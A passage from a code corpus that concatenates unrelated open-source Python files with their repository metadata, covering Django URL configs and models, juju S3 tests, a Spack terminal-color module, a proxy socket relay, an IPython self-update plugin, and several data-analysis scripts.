error = S3Error("<error/>", 404)
error.errors = [{"Code": "NoSuchBucket"}]
self.mocker.result(fail(error))
self.mocker.replay()
provider = self.get_provider()
d = provider.load_state()
def assert_load_value(value):
self.assertIdentical(value, False)
d.addCallback(assert_load_value)
return d
def test_load_nonexistant(self):
"""
When loading saved state from S3, the provider bootstrap gracefully
handles the scenario where there is no saved state.
"""
self.s3.get_object(self.env_name, "provider-state")
self.mocker.result(succeed(dump([])))
self.mocker.replay()
provider = self.get_provider()
d = provider.load_state()
def assert_load_value(value):
self.assertIdentical(value, False)
d.addCallback(assert_load_value)
return d
|
anbangr/trusted-juju
|
juju/providers/ec2/tests/test_state.py
|
Python
|
agpl-3.0
| 4,134 | 0 |
from django.conf.urls import patterns, include, url
from django.conf.urls.static import static
from django.conf import settings
from django.contrib import admin
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'isucdc2.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^admin/', include(admin.site.urls)),
url(r'^', include('cdc.urls', namespace="cdc")),
) + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
ISEAGE-ISU/cdc2-2015-www
|
isucdc2/urls.py
|
Python
|
mit
| 469 | 0.008529 |
"""
33. get_or_create()
``get_or_create()`` does what it says: it tries to look up an object with the
given parameters. If an object isn't found, it creates one with the given
parameters.
"""
from __future__ import unicode_literals
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
@python_2_unicode_compatible
class Person(models.Model):
first_name = models.CharField(max_length=100)
last_name = models.CharField(max_length=100)
birthday = models.DateField()
def __str__(self):
return '%s %s' % (self.first_name, self.last_name)
class DefaultPerson(models.Model):
first_name = models.CharField(max_length=100, default="Anonymous")
class ManualPrimaryKeyTest(models.Model):
id = models.IntegerField(primary_key=True)
data = models.CharField(max_length=100)
class Profile(models.Model):
person = models.ForeignKey(Person, primary_key=True)
class Tag(models.Model):
text = models.CharField(max_length=255, unique=True)
class Thing(models.Model):
name = models.CharField(max_length=256)
tags = models.ManyToManyField(Tag)
class Publisher(models.Model):
name = models.CharField(max_length=100)
class Author(models.Model):
name = models.CharField(max_length=100)
class Book(models.Model):
name = models.CharField(max_length=100)
authors = models.ManyToManyField(Author, related_name='books')
publisher = models.ForeignKey(Publisher, related_name='books', db_column="publisher_id_column")
|
jyotsna1820/django
|
tests/get_or_create/models.py
|
Python
|
bsd-3-clause
| 1,518 | 0.000659 |
""" smashlib.plugins.cli_update
The handler for "smash --update". This will default to
using whatever branch is already checked out
"""
from fabric import api
from goulash.python import splitext, ops
from smashlib import get_smash
from smashlib.util import CLOpt
from smashlib.plugins import Plugin
from smashlib.util.events import receives_event
from smashlib.channels import C_SMASH_INIT_COMPLETE
from smashlib import data
class UpdateSmash(Plugin):
""" This plugin is responsible for doing the work whenever smash
is invoked with "--update".
"""
update = None
verbose = True # do not change, user needs some feedback
def get_cli_arguments(self):
return [
CLOpt(
args = ['--update'],
kargs = dict(default=False,
action='store_true'))
]
def use_argv(self, args):
self.update = args.update
@receives_event(C_SMASH_INIT_COMPLETE)
def consider_updating(self):
if self.update:
try:
self.run_update()
finally:
self.smash.shell.run_cell('exit')
def run_update(self):
""" """
smash_dir = data.SMASH_DIR
with api.lcd(smash_dir):
with api.settings(api.hide('warnings'), warn_only=True, quiet=True):
result = api.local('git diff-index --quiet HEAD --')
changed = (1 == result.return_code)
if changed:
error = "aborting due to local changes in {0}"
self.report(error.format(smash_dir))
else:
api.local('git pull')
api.local('./bin/pip install -r requirements.txt')
def load_ipython_extension(ip):
""" called by %load_ext magic """
return UpdateSmash(get_ipython()).install()
|
mattvonrocketstein/smash
|
smashlib/plugins/cli_update.py
|
Python
|
mit
| 1,850 | 0.004324 |
from django.core.management.base import BaseCommand
from lizard_blockbox import import_helpers
class Command(BaseCommand):
args = ""
help = "Merge the measure shapes to get one json."
def handle(self, *args, **kwargs):
import_helpers.merge_measures_blockbox(self.stdout)
|
lizardsystem/lizard-blockbox
|
lizard_blockbox/management/commands/merge_measures_blockbox.py
|
Python
|
gpl-3.0
| 294 | 0 |
import clr
clr.AddReference('RevitAPI')
from Autodesk.Revit.DB import *
mats = UnwrapElement(IN[0])
colorlist = list()
glowlist = list()
classlist = list()
shinylist = list()
smoothlist = list()
translist = list()
for mat in mats:
colorlist.append(mat.Color)
if mat.Glow:
glowlist.append(True)
else:
glowlist.append(False)
classlist.append(mat.MaterialClass)
shinylist.append(mat.Shininess)
smoothlist.append(mat.Smoothness)
translist.append(mat.Transparency)
OUT = (classlist,colorlist,glowlist,shinylist,smoothlist,translist)
|
andydandy74/ClockworkForDynamo
|
nodes/1.x/python/Material.Properties.py
|
Python
|
mit
| 540 | 0.02963 |
# The MIT License (MIT)
#
# Copyright shifvb 2015
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import select
def read_write(client, target):
time_out_max = 20
socs = [client, target]
count = 0
while 1:
count += 1
(recv, _, error) = select.select(socs, [], socs, 3)
if error:
break
if recv:
for in_ in recv:
data = in_.recv(8192)
if in_ is client:
out = target
else:
out = client
if data:
# # debug
# if out == target:
# print('client->server {}\n'.format(data))
# else:
# print('server->client {}\n'.format(data))
out.send(data)
count = 0
if count == time_out_max:
break
|
shifvb/DarkChina
|
http_proxy/tools/async_IO.py
|
Python
|
mit
| 1,931 | 0.000518 |
import sys
import random
import collections
import itertools
import bisect
# @include
def nonuniform_random_number_generation(values, probabilities):
prefix_sum_of_probabilities = (
[0.0] + list(itertools.accumulate(probabilities)))
interval_idx = bisect.bisect(prefix_sum_of_probabilities,
random.random()) - 1
return values[interval_idx]
# @exclude
def main():
n = int(sys.argv[1]) if len(sys.argv) == 2 else random.randint(1, 50)
T = [float(i) for i in range(n)]
P = []
full_prob = 1.0
for i in range(n - 1):
pi = random.uniform(0.0, full_prob)
P.append(pi)
full_prob -= pi
P.append(full_prob)
print(*T)
print(*P)
print(nonuniform_random_number_generation(T, P))
# Test. Perform the nonuniform random number generation for n * k_times
# times and calculate the distribution of each bucket.
k_times = 100000
counts = collections.Counter(
int(nonuniform_random_number_generation(T, P))
for _ in range(n * k_times))
for i in range(n):
print(counts[i] / (n * k_times), P[i])
assert abs(counts[i] / (n * k_times) - P[i]) < 0.01
if __name__ == '__main__':
main()
|
meisamhe/GPLshared
|
Programming/MPI — AMath 483 583, Spring 2013 1.0 documentation_files/nonuniform_random_number_generation.py
|
Python
|
gpl-3.0
| 1,235 | 0 |
"""
def toLocal(dt, offset = 8):
dt: datetime
offset: default 8 china time
"""
import datetime
def toLocal(dt, offset = 8):
localDateTime = dt + datetime.timedelta(hours=offset)
return localDateTime
if __name__ == '__main__':
now = datetime.datetime.utcnow()
print now
print toLocal(now)
print now
|
pisceanfoot/py_easyXY
|
py_easyXY/datetime/tzone.py
|
Python
|
apache-2.0
| 309 | 0.038835 |
#!/usr/bin/env python3
#
# The MIT License (MIT)
#
# Copyright (C) 2015 - Francois Doray <francois.pierre-doray@polymtl.ca>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import argparse
import csv
import math
import pprint
import statistics
import numpy
import re
# Utility functions.
def GetFileValues(filename):
values = []
with open(filename, 'r') as filecontent:
if 'overhead-babeltrace' in filename:
for line in filecontent.readlines():
match = re.match(r'(.*)real\s0m(.*)s.*', line, re.M|re.I)
if (match):
values.append(eval(match.group(2)))
if 'overhead-find' in filename:
for line in filecontent.readlines():
match = re.match(r'(.*)real\s0m(.*)s.*', line, re.M|re.I)
if (match):
values.append(eval(match.group(2)))
elif 'overhead-cpu' in filename:
for line in filecontent.readlines():
match = re.match(r'(.*)total time:\s*(.*)s.*', line, re.M|re.I)
if (match):
values.append(eval(match.group(2)))
elif 'overhead-lighttpd' in filename:
for line in filecontent.readlines():
match = re.match(r'(.*)Time taken for tests:\s*(.*) seconds.*', line, re.M|re.I)
if (match):
values.append(eval(match.group(2)))
else:
first = True
reader = csv.reader(filecontent)
for row in reader:
if first:
first = False
continue
v = eval(row[0])
if 'overhead-mongo' in filename:
v = v / 1000000000
values.append(v)
return values
def GetXYFileValues(filename):
x = []
y = []
with open(filename, 'r') as filecontent:
first = True
reader = csv.reader(filecontent)
for row in reader:
if first:
first = False
continue
y.append(eval(row[0]))
x.append(eval(row[1]))
return {'x': x, 'y': y}
def GetXYFileStdDev(filename):
values = GetXYFileValues(filename)
grouped = {}
for i in range(0, len(values['x'])):
if values['x'][i] not in grouped:
grouped[values['x'][i]] = []
grouped[values['x'][i]].append(values['y'][i])
total_stddev = 0
for x, v in grouped.items():
stddev = math.sqrt(statistics.variance(v))
if stddev > total_stddev:
total_stddev = stddev
return stddev
def GetFileMean(filename):
values = GetFileValues(filename)
return statistics.mean(values)
def GetFileStdDev(filename):
values = GetFileValues(filename)
return math.sqrt(statistics.variance(values))
def RemoveBase(values, base, numactions):
values[:] = [(value - base) / numactions for value in values]
return values
# Experiment: GETPID
def SummaryGetPid(results_dir):
NUM_ACTIONS = 100000000
base_mean = GetFileMean(results_dir + '/getpid-base.csv')
emptyprobes_mean = GetFileMean(results_dir + '/getpid-emptyprobes.csv')
bookkeeping_mean = GetFileMean(results_dir + '/getpid-bookkeeping.csv')
signal_mean = GetFileMean(results_dir + '/getpid-signal.csv')
base_stddev = GetFileStdDev(results_dir + '/getpid-base.csv')
emptyprobes_stddev = GetFileStdDev(results_dir + '/getpid-emptyprobes.csv')
bookkeeping_stddev = GetFileStdDev(results_dir + '/getpid-bookkeeping.csv')
signal_stddev = GetFileStdDev(results_dir + '/getpid-signal.csv')
print('EXPERIMENT: GETPID (base stddev: {0:.1f})'.format(base_stddev / base_mean))
print('Empty probes: {0:.0f} ns (stddev={1:.1f})'.format((emptyprobes_mean - base_mean) / NUM_ACTIONS,
100 * emptyprobes_stddev / emptyprobes_mean))
print('Bookkeeping: {0:.0f} ns (stddev={1:.1f})'.format((bookkeeping_mean - base_mean) / NUM_ACTIONS,
100 * bookkeeping_stddev / bookkeeping_mean))
print('Signal: {0:.0f} ns (stddev={1:.1f})'.format((signal_mean - base_mean) / NUM_ACTIONS,
100 * signal_stddev / signal_mean))
print()
# Experiment: UST
def SummaryUST(results_dir):
NUM_ACTIONS = 100000000
base_mean = GetFileMean(results_dir + '/ust-base.csv')
tracepoint_mean = GetFileMean(results_dir + '/ust-tracepoint.csv')
tracepoint_stddev = GetFileStdDev(results_dir + '/ust-tracepoint.csv')
print('EXPERIMENT: UST TRACEPOINT')
print('UST event: {0:.0f} ns (stddev: {1:.1f})'.format((tracepoint_mean - base_mean) / NUM_ACTIONS,
100 * tracepoint_stddev / tracepoint_mean))
print('')
# Experiment: LIBUNWIND
def SummaryLibunwind(results_dir):
NUM_ACTIONS = 1
base = GetFileMean(results_dir + '/libunwind-base.csv')
minregs = GetXYFileValues(results_dir + '/libunwind-optimal-withcache.csv')
minregs_nocache = GetXYFileValues(results_dir + '/libunwind-optimal-nocache.csv')
master_nocache = GetXYFileValues(results_dir + '/libunwind-nocache.csv')
base_stddev = GetXYFileStdDev(results_dir + '/libunwind-base.csv')
minregs_stddev = GetXYFileStdDev(results_dir + '/libunwind-optimal-withcache.csv')
minregs_nocache_stddev = GetXYFileStdDev(results_dir + '/libunwind-optimal-nocache.csv')
master_nocache_stddev = GetXYFileStdDev(results_dir + '/libunwind-nocache.csv')
minregs['y'] = RemoveBase(minregs['y'], base, NUM_ACTIONS)
minregs_nocache['y'] = RemoveBase(minregs_nocache['y'], base, NUM_ACTIONS)
master_nocache['y'] = RemoveBase(master_nocache['y'], base, NUM_ACTIONS)
minregs['x'] = RemoveBase(minregs['x'], 0, 1)
minregs_nocache['x'] = RemoveBase(minregs_nocache['x'], 0, 1)
master_nocache['x'] = RemoveBase(master_nocache['x'], 0, 1)
minregs_reg = numpy.polyfit(minregs['x'], minregs['y'], 1)
minregs_nocache_reg = numpy.polyfit(minregs_nocache['x'], minregs_nocache['y'], 1)
master_nocache_reg = numpy.polyfit(master_nocache['x'], master_nocache['y'], 1)
print('EXPERIMENT: LIBUNWIND')
print('Minimal regs, with cache: frame = {0:.0f} ns, base = {1:.0f} ns, stddev={2:.0f} ns'.format(minregs_reg[0], minregs_reg[1], minregs_stddev))
print('Minimal regs, no cache: frame = {0:.0f} ns, base = {1:.0f} ns, stddev={2:.0f} ns'.format(minregs_nocache_reg[0], minregs_nocache_reg[1], minregs_nocache_stddev))
print('Master, no cache : frame = {0:.0f} ns, base = {1:.0f} ns, stddev={2:.0f} ns'.format(master_nocache_reg[0], master_nocache_reg[1], master_nocache_stddev))
print()
# Experiment: OVERHEAD
def SummaryOverhead(results_dir):
APPS = ['cpu', 'babeltrace', 'find', 'mongo']
TESTS = ['nothing', 'kernel', 'notracing-cpusyscalls', 'ust-cpusyscalls', 'critical-cpusyscalls']
FANCY_TESTS = ['Base ',
'Traditionnal tracing ',
'Generating stack events / No tracing ',
'Tracing stack events ',
'Tracing stack and critical path events ']
print('EXPERIMENT: OVERHEAD')
results = {}
for app in APPS:
base = GetFileMean(results_dir + '/overhead-' + app + '/nothing.csv')
results[app] = {}
for test in TESTS:
mean = GetFileMean(results_dir + '/overhead-' + app + '/' + test + '.csv')
stddev = GetFileStdDev(results_dir + '/overhead-' + app + '/' + test + '.csv')
overhead = ((mean / base) - 1) * 100
results[app][test] = {'mean': mean, 'stddev': stddev, 'overhead': overhead}
print('TABLE: TIME')
for test_i in range(0, len(TESTS)):
line = [FANCY_TESTS[test_i]]
for app in APPS:
line.append(results[app][TESTS[test_i]]['mean'])
line.append(results[app][TESTS[test_i]]['stddev'])
print('{0}& {1:.2f} & {2:.2f} & {3:.2f} & {4:.2f} & {5:.2f} & {6:.2f} & {7:.2f} & {8:.2f} \\\\\\hline'.format(*line))
print()
print('TABLE: PERCENT')
for test_i in range(0, len(TESTS)):
line = [FANCY_TESTS[test_i]]
for app in APPS:
line.append(results[app][TESTS[test_i]]['overhead'])
print('{0}& {1:.1f} & {2:.1f} & {3:.1f} & {4:.1f} \\\\\\hline'.format(*line))
print()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Generate summary from experimental results.')
parser.add_argument('results', metavar="<path/to/results>", help='Path to results directory.')
args = parser.parse_args()
SummaryGetPid(args.results)
SummaryUST(args.results)
SummaryLibunwind(args.results)
SummaryOverhead(args.results)
|
fdoray/tracecompare-benchmark
|
scripts/summary.py
|
Python
|
gpl-3.0
| 9,109 | 0.016797 |
# Copyright (c) 2010-2013 by Yaco Sistemas <goinnn@gmail.com> or <pmartin@yaco.es>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this programe. If not, see <http://www.gnu.org/licenses/>.
try:
from django.conf.urls import include, patterns, url
except ImportError: # Django < 1.4
from django.conf.urls.defaults import include, patterns, url
urlpatterns = patterns('testing.example_extra_fields.views',
url(r'^$', 'extra_index', name='extra_index'),
url(r'^(?P<resource_id>\w+)/$', 'extra_edit', name="extra_edit"),
)
|
paridin/django-inplaceedit
|
testing/testing/example_extra_fields/urls.py
|
Python
|
lgpl-3.0
| 1,090 | 0.001835 |
# coding=utf-8
# URL: https://pymedusa.com
#
# This file is part of Medusa.
#
# Medusa is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Medusa is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Medusa. If not, see <http://www.gnu.org/licenses/>.
"""Custom exceptions used or raised by indexer_api"""
from tvdb_api.tvdb_exceptions import (tvdb_exception, tvdb_error, tvdb_userabort, tvdb_shownotfound, tvdb_showincomplete,
tvdb_seasonnotfound, tvdb_episodenotfound, tvdb_attributenotfound)
indexerExcepts = ["indexer_exception", "indexer_error", "indexer_userabort", "indexer_shownotfound", "indexer_showincomplete",
"indexer_seasonnotfound", "indexer_episodenotfound", "indexer_attributenotfound"]
tvdbExcepts = ["tvdb_exception", "tvdb_error", "tvdb_userabort", "tvdb_shownotfound", "tvdb_showincomplete",
"tvdb_seasonnotfound", "tvdb_episodenotfound", "tvdb_attributenotfound"]
# link API exceptions to our exception handler
indexer_exception = tvdb_exception
indexer_error = tvdb_error
indexer_userabort = tvdb_userabort
indexer_attributenotfound = tvdb_attributenotfound
indexer_episodenotfound = tvdb_episodenotfound
indexer_seasonnotfound = tvdb_seasonnotfound
indexer_shownotfound = tvdb_shownotfound
indexer_showincomplete = tvdb_showincomplete
|
Thraxis/pymedusa
|
sickbeard/indexers/indexer_exceptions.py
|
Python
|
gpl-3.0
| 1,776 | 0.003378 |
##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
"""
This file implements an expression syntax, similar to ``printf``, for adding
ANSI colors to text.
See ``colorize()``, ``cwrite()``, and ``cprint()`` for routines that can
generate colored output.
``colorize`` will take a string and replace all color expressions with
ANSI control codes. If the ``isatty`` keyword arg is set to False, then
the color expressions will be converted to null strings, and the
returned string will have no color.
``cwrite`` and ``cprint`` are equivalent to ``write()`` and ``print()``
calls in python, but they colorize their output. If the ``stream`` argument is
not supplied, they write to ``sys.stdout``.
Here are some example color expressions:
========== ============================================================
Expression Meaning
========== ============================================================
@r Turn on red coloring
@R Turn on bright red coloring
@*{foo} Bold foo, but don't change text color
@_{bar} Underline bar, but don't change text color
@*b Turn on bold, blue text
@_B Turn on bright blue text with an underline
@. Revert to plain formatting
@*g{green} Print out 'green' in bold, green text, then reset to plain.
@*ggreen@. Print out 'green' in bold, green text, then reset to plain.
========== ============================================================
The syntax consists of:
========== =================================================
color-expr '@' [style] color-code '{' text '}' | '@.' | '@@'
style '*' | '_'
color-code [krgybmcwKRGYBMCW]
text .*
========== =================================================
'@' indicates the start of a color expression. It can be followed
by an optional * or _ that indicates whether the font should be bold or
underlined. If * or _ is not provided, the text will be plain. Then
an optional color code is supplied. This can be [krgybmcw] or [KRGYBMCW],
where the letters map to black(k), red(r), green(g), yellow(y), blue(b),
magenta(m), cyan(c), and white(w). Lowercase letters denote normal ANSI
colors and capital letters denote bright ANSI colors.
Finally, the color expression can be followed by text enclosed in {}. If
braces are present, only the text in braces is colored. If the braces are
NOT present, then just the control codes to enable the color will be output.
The console can be reset later to plain text with '@.'.
To output an @, use '@@'. To output a } inside braces, use '}}'.
"""
import re
import sys
from contextlib import contextmanager
class ColorParseError(Exception):
"""Raised when a color format fails to parse."""
def __init__(self, message):
super(ColorParseError, self).__init__(message)
# Text styles for ansi codes
styles = {'*': '1', # bold
'_': '4', # underline
None: '0'} # plain
# Dim and bright ansi colors
colors = {'k': 30, 'K': 90, # black
'r': 31, 'R': 91, # red
'g': 32, 'G': 92, # green
'y': 33, 'Y': 93, # yellow
'b': 34, 'B': 94, # blue
'm': 35, 'M': 95, # magenta
'c': 36, 'C': 96, # cyan
'w': 37, 'W': 97} # white
# Regex to be used for color formatting
color_re = r'@(?:@|\.|([*_])?([a-zA-Z])?(?:{((?:[^}]|}})*)})?)'
# Mapping from color arguments to values for tty.set_color
color_when_values = {
'always': True,
'auto': None,
'never': False
}
# Force color; None: Only color if stdout is a tty
# True: Always colorize output, False: Never colorize output
_force_color = None
def _color_when_value(when):
"""Raise a ValueError for an invalid color setting.
Valid values are 'always', 'never', and 'auto', or equivalently,
True, False, and None.
"""
if when in color_when_values:
return color_when_values[when]
elif when not in color_when_values.values():
raise ValueError('Invalid color setting: %s' % when)
return when
def get_color_when():
"""Return whether commands should print color or not."""
if _force_color is not None:
return _force_color
return sys.stdout.isatty()
def set_color_when(when):
"""Set when color should be applied. Options are:
* True or 'always': always print color
* False or 'never': never print color
* None or 'auto': only print color if sys.stdout is a tty.
"""
global _force_color
_force_color = _color_when_value(when)
@contextmanager
def color_when(value):
"""Context manager to temporarily use a particular color setting."""
old_value = value
set_color_when(value)
yield
set_color_when(old_value)
class match_to_ansi(object):
def __init__(self, color=True):
self.color = _color_when_value(color)
def escape(self, s):
"""Returns a TTY escape sequence for a color"""
if self.color:
return "\033[%sm" % s
else:
return ''
def __call__(self, match):
"""Convert a match object generated by ``color_re`` into an ansi
color code. This can be used as a handler in ``re.sub``.
"""
style, color, text = match.groups()
m = match.group(0)
if m == '@@':
return '@'
elif m == '@.':
return self.escape(0)
elif m == '@':
raise ColorParseError("Incomplete color format: '%s' in %s"
% (m, match.string))
string = styles[style]
if color:
if color not in colors:
raise ColorParseError("invalid color specifier: '%s' in '%s'"
% (color, match.string))
string += ';' + str(colors[color])
colored_text = ''
if text:
colored_text = text + self.escape(0)
return self.escape(string) + colored_text
def colorize(string, **kwargs):
"""Replace all color expressions in a string with ANSI control codes.
Args:
string (str): The string to replace
Returns:
str: The filtered string
Keyword Arguments:
color (bool): If False, output will be plain text without control
codes, for output to non-console devices.
"""
color = _color_when_value(kwargs.get('color', get_color_when()))
return re.sub(color_re, match_to_ansi(color), string)
def clen(string):
"""Return the length of a string, excluding ansi color sequences."""
return len(re.sub(r'\033[^m]*m', '', string))
def cextra(string):
""""Length of extra color characters in a string"""
return len(''.join(re.findall(r'\033[^m]*m', string)))
def cwrite(string, stream=sys.stdout, color=None):
"""Replace all color expressions in string with ANSI control
codes and write the result to the stream. If color is
False, this will write plain text with o color. If True,
then it will always write colored output. If not supplied,
then it will be set based on stream.isatty().
"""
if color is None:
color = get_color_when()
stream.write(colorize(string, color=color))
def cprint(string, stream=sys.stdout, color=None):
"""Same as cwrite, but writes a trailing newline to the stream."""
cwrite(string + "\n", stream, color)
def cescape(string):
"""Replace all @ with @@ in the string provided."""
return str(string).replace('@', '@@')
class ColorStream(object):
def __init__(self, stream, color=None):
self._stream = stream
self._color = color
def write(self, string, **kwargs):
raw = kwargs.get('raw', False)
raw_write = getattr(self._stream, 'write')
color = self._color
if self._color is None:
if raw:
color = True
else:
color = get_color_when()
raw_write(colorize(string, color=color))
def writelines(self, sequence, **kwargs):
raw = kwargs.get('raw', False)
for string in sequence:
self.write(string, self.color, raw=raw)
|
skosukhin/spack
|
lib/spack/llnl/util/tty/color.py
|
Python
|
lgpl-2.1
| 9,290 | 0 |
import matplotlib.pyplot as plt
import numpy as np
from scipy.optimize import root
import bct
eps = np.finfo(float).eps
def pij_wij(x,y,t):
xij = np.outer(x,x)
yij = np.outer(y,y)
pij = xij*((yij)**t)/(1.0+xij*(yij**t) - (yij**t))
wij = (t*(xij-1.0)*(yij**t))/((1.0 + xij*(yij**t) - (yij**t) )) - 1.0/(np.log(np.abs(yij+eps)))
return pij,wij
def eq(z, t, ki, si):
nz = len(z)
n = nz//2
pij,wij = pij_wij(z[0:n],z[n:],t) # x is first half, y is second half
#print(pij.shape,wij.shape,ki.shape,si.shape)
#pij -= pij.di
np.fill_diagonal(pij,0)
np.fill_diagonal(wij,0)
delta_pij = np.sum(pij,axis=0) - ki
delta_wij = np.sum(wij,axis=0) - si
return np.concatenate([delta_pij, delta_wij])
def factor_model(ci,T,eta,mu, correlation=False):
N = len(ci) # number of nodes, length of membership vector,
# Initialize the observations vector a TxN matrix of NaNs,
Y = np.ones([T,N])*np.nan
# Fill the identical observations in the maximally correlated subsets,
for c in np.unique(ci):
i = np.where(ci==c)[0]
Y[:,i] = np.kron(np.ones((1,(ci==c).sum())),np.random.randn(T,1))
# Add local noise beta on each time-series,
Y += eta*np.random.randn(T,N)
# Add global signal mu that correlates globally each time series,
Y += mu*np.kron(np.ones((1,N)),np.random.randn(T,1))
from scipy.stats import zscore
Y = zscore(Y)
if correlation:
C = np.corrcoef(Y.T)
np.fill_diagonal(C,0)
else:
C = np.cov(Y.T)
return C
def inference_cEWRGt(W, thresh):
k = (W>0).sum(axis=0) # degrees
s = W.sum(axis=0) # strength
#from scipy.optimize import root
from scipy.optimize import least_squares
x0=np.concatenate([k,s])*1E-4 # initial solution
# Initialize least squares from previous solution
sollm = least_squares(lambda v: eq(v,thresh,k,s),
x0=x0,
bounds= (0,np.inf),
method='trf',
ftol=1E-8,
xtol=1E-8,
verbose=1)
sollm = root(lambda z: eq(z,thresh,k,s),
x0=x0,
method='lm',
options={'xtol':1E-30,'gtol':1E-30,'ftol':1E-30},
tol=1E-6)
#print('Final cost', sollm['cost'])
sollm = sollm['x']
n2 = int(len(sollm)//2)
x,y = sollm[0:n2],sollm[n2:]
return x, y
def plot_results(W,x,y,thresh):
pij,wij = pij_wij(x,y,thresh) # compute the output from the optimization result
plt.figure(figsize=(12,8))
plt.subplot(2,3,1)
im = plt.imshow(pij)
plt.colorbar(im,fraction=0.046, pad=0.04)
plt.grid(False)
plt.title('$p_{ij}$')
plt.subplot(2,3,2)
im = plt.imshow(wij)
plt.colorbar(im,fraction=0.046, pad=0.04)
plt.grid(False)
plt.title('$<w_{ij}>$')
plt.subplot(2,3,3)
im = plt.imshow(W)
plt.colorbar(im,fraction=0.046, pad=0.04)
plt.grid(False)
plt.title('empirical matrix')
plt.subplot(2,3,4)
plt.plot((W>0).sum(axis=0),pij.sum(axis=0), 'b.')
plt.plot(np.linspace(0,pij.sum(axis=0).max()),np.linspace(0,pij.sum(axis=0).max()),'r-')
plt.grid(True)
plt.axis('equal')
plt.title('$k_i - <k_i>$')
plt.ylabel('model')
plt.xlabel('empirical')
#plt.xlim([0,min((W>0).sum(axis=0).max(),pij.sum(axis=0).max())])
#plt.ylim([0,min((W>0).sum(axis=0).max(),pij.sum(axis=0).max())])
plt.subplot(2,3,5)
plt.plot(W.sum(axis=0),wij.sum(axis=0), 'b.')
plt.plot(np.linspace(0,wij.sum(axis=0).max()),np.linspace(0,wij.sum(axis=0).max()),'r-')
plt.title('$ s_i - <s_i>$')
plt.axis('equal')
#plt.xlim([0,wij.sum(axis=0).max()])
#plt.ylim([0,wij.sum(axis=0).max()])
plt.grid(True)
plt.ylabel('model')
plt.xlabel('empirical')
plt.tight_layout()
plt.show()
if __name__=='__main__':
thresh = 0.2 # threshold
T = 200 # number of time points to sample
eta = 3.0 # localnoise
mu = 1.0 # globalnoise
C = np.arctanh(factor_model([1]*40 + [2]*40 + [3]*30, T, eta, mu, True))
At = bct.threshold_absolute(C, thresh)
n=len(At)
k = (At>0).sum(axis=0)
s = At.sum(axis=0)
x,y = inference_cEWRGt(At, thresh)
plot_results(At, x, y, thresh)
|
CarloNicolini/CarloNicolini.github.io
|
sections/science/_posts/example_cEWRG.py
|
Python
|
mit
| 4,329 | 0.026565 |
from configparser import ConfigParser
import psycopg2
class Postgres(object):
def __init__(self, db_name):
filename = 'database.ini'
section = 'postgresql'
parser = ConfigParser()
parser.read(filename)
self.db = {}
if parser.has_section(section):
self.db['database'] = db_name
params = parser.items(section)
for param in params:
self.db[param[0]] = param[1]
else:
